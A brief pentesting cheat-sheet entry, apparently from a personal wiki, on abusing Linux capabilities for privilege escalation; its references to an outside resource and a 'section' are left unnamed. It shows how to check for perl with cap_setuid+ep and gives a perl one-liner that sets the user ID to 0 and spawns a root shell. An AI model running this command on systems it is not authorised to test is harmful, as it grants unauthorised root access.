Last updated 2 years ago
Capabilities is a well known attack vector. has lots of really good information about the many UNIX/Linux binaries that can be abused.
section talks about Perl and what you can do with CAP_SETUID being set.
If it's set:
/usr/bin/perl = cap_setuid+ep
Then do this:
./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'